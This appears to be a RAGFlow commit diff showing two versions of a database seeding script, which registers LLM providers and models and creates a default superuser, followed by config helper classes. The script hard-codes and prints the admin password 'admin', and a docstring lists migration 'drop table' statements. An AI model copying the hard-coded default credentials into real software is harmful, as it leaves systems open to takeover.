||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import os
|
||||
import time
|
||||
import uuid
|
||||
from copy import deepcopy
|
||||
|
||||
from api.db import LLMType, UserTenantRole
|
||||
from api.db.db_models import init_database_tables as init_web_db, LLMFactories, LLM, TenantLLM
|
||||
from api.db.services import UserService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMFactoriesService, LLMService, TenantLLMService, LLMBundle
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.settings import CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, LLM_FACTORY, API_KEY, LLM_BASE_URL
|
||||
|
||||
|
||||
def init_superuser():
|
||||
user_info = {
|
||||
"id": uuid.uuid1().hex,
|
||||
"password": "admin",
|
||||
"nickname": "admin",
|
||||
"is_superuser": True,
|
||||
"email": "admin@ragflow.io",
|
||||
"creator": "system",
|
||||
"status": "1",
|
||||
}
|
||||
tenant = {
|
||||
"id": user_info["id"],
|
||||
"name": user_info["nickname"] + "‘s Kingdom",
|
||||
"llm_id": CHAT_MDL,
|
||||
"embd_id": EMBEDDING_MDL,
|
||||
"asr_id": ASR_MDL,
|
||||
"parser_ids": PARSERS,
|
||||
"img2txt_id": IMAGE2TEXT_MDL
|
||||
}
|
||||
usr_tenant = {
|
||||
"tenant_id": user_info["id"],
|
||||
"user_id": user_info["id"],
|
||||
"invited_by": user_info["id"],
|
||||
"role": UserTenantRole.OWNER
|
||||
}
|
||||
tenant_llm = []
|
||||
for llm in LLMService.query(fid=LLM_FACTORY):
|
||||
tenant_llm.append(
|
||||
{"tenant_id": user_info["id"], "llm_factory": LLM_FACTORY, "llm_name": llm.llm_name, "model_type": llm.model_type,
|
||||
"api_key": API_KEY, "api_base": LLM_BASE_URL})
|
||||
|
||||
if not UserService.save(**user_info):
|
||||
print("\033[93m【ERROR】\033[0mcan't init admin.")
|
||||
return
|
||||
TenantService.insert(**tenant)
|
||||
UserTenantService.insert(**usr_tenant)
|
||||
TenantLLMService.insert_many(tenant_llm)
|
||||
print(
|
||||
"【INFO】Super user initialized. \033[93memail: admin@ragflow.io, password: admin\033[0m. Changing the password after logining is strongly recomanded.")
|
||||
|
||||
chat_mdl = LLMBundle(tenant["id"], LLMType.CHAT, tenant["llm_id"])
|
||||
msg = chat_mdl.chat(system="", history=[
|
||||
{"role": "user", "content": "Hello!"}], gen_conf={})
|
||||
if msg.find("ERROR: ") == 0:
|
||||
print(
|
||||
"\33[91m【ERROR】\33[0m: ",
|
||||
"'{}' dosen't work. {}".format(
|
||||
tenant["llm_id"],
|
||||
msg))
|
||||
embd_mdl = LLMBundle(tenant["id"], LLMType.EMBEDDING, tenant["embd_id"])
|
||||
v, c = embd_mdl.encode(["Hello!"])
|
||||
if c == 0:
|
||||
print(
|
||||
"\33[91m【ERROR】\33[0m:",
|
||||
" '{}' dosen't work!".format(
|
||||
tenant["embd_id"]))
|
||||
|
||||
|
||||
factory_infos = [{
|
||||
"name": "OpenAI",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
}, {
|
||||
"name": "Tongyi-Qianwen",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
}, {
|
||||
"name": "ZHIPU-AI",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},
|
||||
{
|
||||
"name": "Ollama",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
}, {
|
||||
"name": "Moonshot",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
}, {
|
||||
"name": "FastEmbed",
|
||||
"logo": "",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
}, {
|
||||
"name": "Xinference",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Youdao",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "DeepSeek",
|
||||
"logo": "",
|
||||
"tags": "LLM",
|
||||
"status": "1",
|
||||
},
|
||||
# {
|
||||
# "name": "文心一言",
|
||||
# "logo": "",
|
||||
# "tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
# "status": "1",
|
||||
# },
|
||||
]
|
||||
|
||||
|
||||
def init_llm_factory():
|
||||
llm_infos = [
|
||||
# ---------------------- OpenAI ------------------------
|
||||
{
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4o",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 128000,
|
||||
"model_type": LLMType.CHAT.value + "," + LLMType.IMAGE2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-3.5-turbo",
|
||||
"tags": "LLM,CHAT,4K",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-3.5-turbo-16k-0613",
|
||||
"tags": "LLM,CHAT,16k",
|
||||
"max_tokens": 16385,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "text-embedding-ada-002",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "text-embedding-3-small",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "text-embedding-3-large",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "whisper-1",
|
||||
"tags": "SPEECH2TEXT",
|
||||
"max_tokens": 25 * 1024 * 1024,
|
||||
"model_type": LLMType.SPEECH2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4-turbo",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},{
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4-32k",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4-vision-preview",
|
||||
"tags": "LLM,CHAT,IMAGE2TEXT",
|
||||
"max_tokens": 765,
|
||||
"model_type": LLMType.IMAGE2TEXT.value
|
||||
},
|
||||
# ----------------------- Qwen -----------------------
|
||||
{
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "qwen-turbo",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "qwen-plus",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "qwen-max-1201",
|
||||
"tags": "LLM,CHAT,6K",
|
||||
"max_tokens": 5899,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "text-embedding-v2",
|
||||
"tags": "TEXT EMBEDDING,2K",
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "paraformer-realtime-8k-v1",
|
||||
"tags": "SPEECH2TEXT",
|
||||
"max_tokens": 25 * 1024 * 1024,
|
||||
"model_type": LLMType.SPEECH2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "qwen-vl-max",
|
||||
"tags": "LLM,CHAT,IMAGE2TEXT",
|
||||
"max_tokens": 765,
|
||||
"model_type": LLMType.IMAGE2TEXT.value
|
||||
},
|
||||
# ---------------------- ZhipuAI ----------------------
|
||||
{
|
||||
"fid": factory_infos[2]["name"],
|
||||
"llm_name": "glm-3-turbo",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 128 * 1000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[2]["name"],
|
||||
"llm_name": "glm-4",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 128 * 1000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[2]["name"],
|
||||
"llm_name": "glm-4v",
|
||||
"tags": "LLM,CHAT,IMAGE2TEXT",
|
||||
"max_tokens": 2000,
|
||||
"model_type": LLMType.IMAGE2TEXT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[2]["name"],
|
||||
"llm_name": "embedding-2",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ Moonshot -----------------------
|
||||
{
|
||||
"fid": factory_infos[4]["name"],
|
||||
"llm_name": "moonshot-v1-8k",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 7900,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[4]["name"],
|
||||
"llm_name": "moonshot-v1-32k",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[4]["name"],
|
||||
"llm_name": "moonshot-v1-128k",
|
||||
"tags": "LLM,CHAT",
|
||||
"max_tokens": 128 * 1000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
# ------------------------ FastEmbed -----------------------
|
||||
{
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "BAAI/bge-small-en-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "BAAI/bge-small-zh-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "BAAI/bge-base-en-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "BAAI/bge-large-en-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "sentence-transformers/all-MiniLM-L6-v2",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "nomic-ai/nomic-embed-text-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "jinaai/jina-embeddings-v2-small-en",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 2147483648,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "jinaai/jina-embeddings-v2-base-en",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 2147483648,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ Youdao -----------------------
|
||||
{
|
||||
"fid": factory_infos[7]["name"],
|
||||
"llm_name": "maidalun1020/bce-embedding-base_v1",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ DeepSeek -----------------------
|
||||
{
|
||||
"fid": factory_infos[8]["name"],
|
||||
"llm_name": "deepseek-chat",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[8]["name"],
|
||||
"llm_name": "deepseek-coder",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 16385,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
]
|
||||
for info in factory_infos:
|
||||
try:
|
||||
LLMFactoriesService.save(**info)
|
||||
except Exception as e:
|
||||
pass
|
||||
for info in llm_infos:
|
||||
try:
|
||||
LLMService.save(**info)
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
LLMFactoriesService.filter_delete([LLMFactories.name == "Local"])
|
||||
LLMService.filter_delete([LLM.fid == "Local"])
|
||||
LLMService.filter_delete([LLM.fid == "Moonshot", LLM.llm_name == "flag-embedding"])
|
||||
TenantLLMService.filter_delete([TenantLLM.llm_factory == "Moonshot", TenantLLM.llm_name == "flag-embedding"])
|
||||
LLMFactoriesService.filter_delete([LLMFactoriesService.model.name == "QAnything"])
|
||||
LLMService.filter_delete([LLMService.model.fid == "QAnything"])
|
||||
TenantLLMService.filter_update([TenantLLMService.model.llm_factory == "QAnything"], {"llm_factory": "Youdao"})
|
||||
## insert openai two embedding models to the current openai user.
|
||||
print("Start to insert 2 OpenAI embedding models...")
|
||||
tenant_ids = set([row["tenant_id"] for row in TenantLLMService.get_openai_models()])
|
||||
for tid in tenant_ids:
|
||||
for row in TenantLLMService.query(llm_factory="OpenAI", tenant_id=tid):
|
||||
row = row.to_dict()
|
||||
row["model_type"] = LLMType.EMBEDDING.value
|
||||
row["llm_name"] = "text-embedding-3-small"
|
||||
row["used_tokens"] = 0
|
||||
try:
|
||||
TenantLLMService.save(**row)
|
||||
row = deepcopy(row)
|
||||
row["llm_name"] = "text-embedding-3-large"
|
||||
TenantLLMService.save(**row)
|
||||
except Exception as e:
|
||||
pass
|
||||
break
|
||||
for kb_id in KnowledgebaseService.get_all_ids():
|
||||
KnowledgebaseService.update_by_id(kb_id, {"doc_num": DocumentService.get_kb_doc_count(kb_id)})
|
||||
"""
|
||||
drop table llm;
|
||||
drop table llm_factories;
|
||||
update tenant set parser_ids='naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One';
|
||||
alter table knowledgebase modify avatar longtext;
|
||||
alter table user modify avatar longtext;
|
||||
alter table dialog modify icon longtext;
|
||||
"""
|
||||
|
||||
|
||||
def init_web_data():
|
||||
start_time = time.time()
|
||||
|
||||
init_llm_factory()
|
||||
if not UserService.get_all().count():
|
||||
init_superuser()
|
||||
|
||||
print("init web data success:{}".format(time.time() - start_time))
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
init_web_db()
|
||||
init_web_data()
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
import os
|
||||
import time
|
||||
import uuid
|
||||
from copy import deepcopy
|
||||
|
||||
from api.db import LLMType, UserTenantRole
|
||||
from api.db.db_models import init_database_tables as init_web_db, LLMFactories, LLM, TenantLLM
|
||||
from api.db.services import UserService
|
||||
from api.db.services.canvas_service import CanvasTemplateService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMFactoriesService, LLMService, TenantLLMService, LLMBundle
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.settings import CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, LLM_FACTORY, API_KEY, LLM_BASE_URL
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
|
||||
|
||||
def init_superuser():
|
||||
user_info = {
|
||||
"id": uuid.uuid1().hex,
|
||||
"password": "admin",
|
||||
"nickname": "admin",
|
||||
"is_superuser": True,
|
||||
"email": "admin@ragflow.io",
|
||||
"creator": "system",
|
||||
"status": "1",
|
||||
}
|
||||
tenant = {
|
||||
"id": user_info["id"],
|
||||
"name": user_info["nickname"] + "‘s Kingdom",
|
||||
"llm_id": CHAT_MDL,
|
||||
"embd_id": EMBEDDING_MDL,
|
||||
"asr_id": ASR_MDL,
|
||||
"parser_ids": PARSERS,
|
||||
"img2txt_id": IMAGE2TEXT_MDL
|
||||
}
|
||||
usr_tenant = {
|
||||
"tenant_id": user_info["id"],
|
||||
"user_id": user_info["id"],
|
||||
"invited_by": user_info["id"],
|
||||
"role": UserTenantRole.OWNER
|
||||
}
|
||||
tenant_llm = []
|
||||
for llm in LLMService.query(fid=LLM_FACTORY):
|
||||
tenant_llm.append(
|
||||
{"tenant_id": user_info["id"], "llm_factory": LLM_FACTORY, "llm_name": llm.llm_name, "model_type": llm.model_type,
|
||||
"api_key": API_KEY, "api_base": LLM_BASE_URL})
|
||||
|
||||
if not UserService.save(**user_info):
|
||||
print("\033[93m【ERROR】\033[0mcan't init admin.")
|
||||
return
|
||||
TenantService.insert(**tenant)
|
||||
UserTenantService.insert(**usr_tenant)
|
||||
TenantLLMService.insert_many(tenant_llm)
|
||||
print(
|
||||
"【INFO】Super user initialized. \033[93memail: admin@ragflow.io, password: admin\033[0m. Changing the password after logining is strongly recomanded.")
|
||||
|
||||
chat_mdl = LLMBundle(tenant["id"], LLMType.CHAT, tenant["llm_id"])
|
||||
msg = chat_mdl.chat(system="", history=[
|
||||
{"role": "user", "content": "Hello!"}], gen_conf={})
|
||||
if msg.find("ERROR: ") == 0:
|
||||
print(
|
||||
"\33[91m【ERROR】\33[0m: ",
|
||||
"'{}' dosen't work. {}".format(
|
||||
tenant["llm_id"],
|
||||
msg))
|
||||
embd_mdl = LLMBundle(tenant["id"], LLMType.EMBEDDING, tenant["embd_id"])
|
||||
v, c = embd_mdl.encode(["Hello!"])
|
||||
if c == 0:
|
||||
print(
|
||||
"\33[91m【ERROR】\33[0m:",
|
||||
" '{}' dosen't work!".format(
|
||||
tenant["embd_id"]))
|
||||
|
||||
|
||||
def init_llm_factory():
|
||||
try:
|
||||
LLMService.filter_delete([(LLM.fid == "MiniMax" or LLM.fid == "Minimax")])
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
factory_llm_infos = json.load(
|
||||
open(
|
||||
os.path.join(get_project_base_directory(), "conf", "llm_factories.json"),
|
||||
"r",
|
||||
)
|
||||
)
|
||||
for factory_llm_info in factory_llm_infos["factory_llm_infos"]:
|
||||
llm_infos = factory_llm_info.pop("llm")
|
||||
try:
|
||||
LLMFactoriesService.save(**factory_llm_info)
|
||||
except Exception as e:
|
||||
pass
|
||||
LLMService.filter_delete([LLM.fid == factory_llm_info["name"]])
|
||||
for llm_info in llm_infos:
|
||||
llm_info["fid"] = factory_llm_info["name"]
|
||||
try:
|
||||
LLMService.save(**llm_info)
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
LLMFactoriesService.filter_delete([LLMFactories.name == "Local"])
|
||||
LLMService.filter_delete([LLM.fid == "Local"])
|
||||
LLMService.filter_delete([LLM.llm_name == "qwen-vl-max"])
|
||||
LLMService.filter_delete([LLM.fid == "Moonshot", LLM.llm_name == "flag-embedding"])
|
||||
TenantLLMService.filter_delete([TenantLLM.llm_factory == "Moonshot", TenantLLM.llm_name == "flag-embedding"])
|
||||
LLMFactoriesService.filter_delete([LLMFactoriesService.model.name == "QAnything"])
|
||||
LLMService.filter_delete([LLMService.model.fid == "QAnything"])
|
||||
TenantLLMService.filter_update([TenantLLMService.model.llm_factory == "QAnything"], {"llm_factory": "Youdao"})
|
||||
TenantService.filter_update([1 == 1], {
|
||||
"parser_ids": "naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,knowledge_graph:Knowledge Graph,email:Email"})
|
||||
## insert openai two embedding models to the current openai user.
|
||||
print("Start to insert 2 OpenAI embedding models...")
|
||||
tenant_ids = set([row["tenant_id"] for row in TenantLLMService.get_openai_models()])
|
||||
for tid in tenant_ids:
|
||||
for row in TenantLLMService.query(llm_factory="OpenAI", tenant_id=tid):
|
||||
row = row.to_dict()
|
||||
row["model_type"] = LLMType.EMBEDDING.value
|
||||
row["llm_name"] = "text-embedding-3-small"
|
||||
row["used_tokens"] = 0
|
||||
try:
|
||||
TenantLLMService.save(**row)
|
||||
row = deepcopy(row)
|
||||
row["llm_name"] = "text-embedding-3-large"
|
||||
TenantLLMService.save(**row)
|
||||
except Exception as e:
|
||||
pass
|
||||
break
|
||||
for kb_id in KnowledgebaseService.get_all_ids():
|
||||
KnowledgebaseService.update_by_id(kb_id, {"doc_num": DocumentService.get_kb_doc_count(kb_id)})
|
||||
"""
|
||||
drop table llm;
|
||||
drop table llm_factories;
|
||||
update tenant set parser_ids='naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,knowledge_graph:Knowledge Graph';
|
||||
alter table knowledgebase modify avatar longtext;
|
||||
alter table user modify avatar longtext;
|
||||
alter table dialog modify icon longtext;
|
||||
"""
|
||||
|
||||
|
||||
def add_graph_templates():
|
||||
dir = os.path.join(get_project_base_directory(), "agent", "templates")
|
||||
for fnm in os.listdir(dir):
|
||||
try:
|
||||
cnvs = json.load(open(os.path.join(dir, fnm), "r"))
|
||||
try:
|
||||
CanvasTemplateService.save(**cnvs)
|
||||
except:
|
||||
CanvasTemplateService.update_by_id(cnvs["id"], cnvs)
|
||||
except Exception as e:
|
||||
print("Add graph templates error: ", e)
|
||||
print("------------", flush=True)
|
||||
|
||||
|
||||
def init_web_data():
|
||||
start_time = time.time()
|
||||
|
||||
init_llm_factory()
|
||||
if not UserService.get_all().count():
|
||||
init_superuser()
|
||||
|
||||
add_graph_templates()
|
||||
print("init web data success:{}".format(time.time() - start_time))
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
init_web_db()
|
||||
init_web_data()
|
||||
|
||||
@ -1,21 +1,21 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import operator
|
||||
import time
|
||||
import typing
|
||||
from api.utils.log_utils import sql_logger
|
||||
import peewee
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import operator
|
||||
import time
|
||||
import typing
|
||||
from api.utils.log_utils import sql_logger
|
||||
import peewee
|
||||
|
||||
@ -1,28 +1,28 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
class ReloadConfigBase:
|
||||
@classmethod
|
||||
def get_all(cls):
|
||||
configs = {}
|
||||
for k, v in cls.__dict__.items():
|
||||
if not callable(getattr(cls, k)) and not k.startswith(
|
||||
"__") and not k.startswith("_"):
|
||||
configs[k] = v
|
||||
return configs
|
||||
|
||||
@classmethod
|
||||
def get(cls, config_name):
|
||||
return getattr(cls, config_name) if hasattr(cls, config_name) else None
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
class ReloadConfigBase:
|
||||
@classmethod
|
||||
def get_all(cls):
|
||||
configs = {}
|
||||
for k, v in cls.__dict__.items():
|
||||
if not callable(getattr(cls, k)) and not k.startswith(
|
||||
"__") and not k.startswith("_"):
|
||||
configs[k] = v
|
||||
return configs
|
||||
|
||||
@classmethod
|
||||
def get(cls, config_name):
|
||||
return getattr(cls, config_name) if hasattr(cls, config_name) else None
|
||||
|
||||
@ -1,54 +1,54 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from api.versions import get_versions
|
||||
from .reload_config_base import ReloadConfigBase
|
||||
|
||||
|
||||
class RuntimeConfig(ReloadConfigBase):
|
||||
DEBUG = None
|
||||
WORK_MODE = None
|
||||
HTTP_PORT = None
|
||||
JOB_SERVER_HOST = None
|
||||
JOB_SERVER_VIP = None
|
||||
ENV = dict()
|
||||
SERVICE_DB = None
|
||||
LOAD_CONFIG_MANAGER = False
|
||||
|
||||
@classmethod
|
||||
def init_config(cls, **kwargs):
|
||||
for k, v in kwargs.items():
|
||||
if hasattr(cls, k):
|
||||
setattr(cls, k, v)
|
||||
|
||||
@classmethod
|
||||
def init_env(cls):
|
||||
cls.ENV.update(get_versions())
|
||||
|
||||
@classmethod
|
||||
def load_config_manager(cls):
|
||||
cls.LOAD_CONFIG_MANAGER = True
|
||||
|
||||
@classmethod
|
||||
def get_env(cls, key):
|
||||
return cls.ENV.get(key, None)
|
||||
|
||||
@classmethod
|
||||
def get_all_env(cls):
|
||||
return cls.ENV
|
||||
|
||||
@classmethod
|
||||
def set_service_db(cls, service_db):
|
||||
cls.SERVICE_DB = service_db
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
